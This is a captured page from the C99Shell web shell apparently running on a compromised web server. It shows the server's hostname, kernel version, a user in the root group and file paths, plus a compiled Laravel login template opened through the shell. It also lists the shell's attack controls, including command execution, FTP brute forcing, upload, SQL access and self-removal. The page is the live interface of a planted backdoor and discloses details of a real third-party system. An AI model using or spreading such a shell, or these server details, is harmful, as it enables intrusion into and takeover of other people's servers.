!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smab.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 29.33 GB of 117.98 GB (24.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     02f86dff88ec3fc312ab1d82277e909a.php (3.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php $__env->startSection('content'); ?>

<!--==== START CONTENT ====-->
<section class="my-5" >
  <div class="row row2 login-box">
      <div class="col-md-4 col-xl-4 col-sm-12 ">
        <div class="login-form">
          <div class="heading-xs my-2 text-center"><?php echo e(__('login')['login_now']); ?></div>
          <span class="text-center">Enter your email address and password to access <?php echo e(config('settingConfig.config_store_name')); ?> account</span>
            <form  method="post" action="<?php echo e(route('customer.login')); ?>" class="my-3">
                <?php if(Session::has('autherror')): ?>
                    <div class="text-center bg-danger p-2 my-2 round">
                      <strong class="text-white"><?php echo \Session::get('autherror'); ?>!</strong>
                  </div>
                <?php endif; ?>
                <?php echo csrf_field(); ?>
                <div class="form-group">
                    <label for="email" class="form-label"> <?php echo e(__('commoninput')['email']); ?> <span class="text-danger"> * </span> </label>
                    <input type="email" class="form-control" id="email" name="email" placeholder="<?php echo e(__('commoninput')['placeholder_email']); ?>" value="<?php echo e(old('email')); ?>">
                    <?php echo $errors->first("email""<span class='text-danger'>:message</span>"); ?>

                </div>
                <div class="form-group">
                    <label for="password" class="form-label"> <?php echo e(__('commoninput')['placeholder_password']); ?> <span class="text-danger"> * </span> </label>
                    <input type="password" class="form-control login-pass" id="password" name="password" placeholder="<?php echo e(__('commoninput')['your']); ?> <?php echo e(__('commoninput')['placeholder_password']); ?>..." value="<?php echo e(old('password')); ?>">
                    <span class="see-password-section">
                        <i class="fa fa-eye-slash"></i>
                    </span>


                    <?php echo $errors->first("password""<span class='text-danger'>:message</span>"); ?>

                </div>
                <div class="text-center">
                    <button type="submit" id="submitlogin" value="submitlogin" class="submitbtn btn-lg"><?php echo e(__('registration')['button_login']); ?></button>
                </div>
                <div class="signup-section mt-2"><?php echo e(__('login')['label_registration_info']); ?> <a href="<?php echo e(route('customer.getregister')); ?>" class="sign-up "> <?php echo e(__('login')['button_registration']); ?></a>.</div>

            </form>
        </div>
      </div>
      <div class="d-none d-md-block d-xl-block d-xl-block col-md-8 col-lg-8 col-xl-8 ">
        <img src="<?php echo e(asset('frontend')); ?>/images/login-bg.png" alt="">
      </div>
  </div>
</section>
<!--==== END CONTENT ====-->

<style media="screen">
.row2 {
 --bs-gutter-x: 0rem;
}
</style>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('frontend.layouts.app', ['class' => 'bg-purple'], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /home/picotech/domains/smab.picotech.app/public_html/resources/views/frontend/user/login.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0062 ]--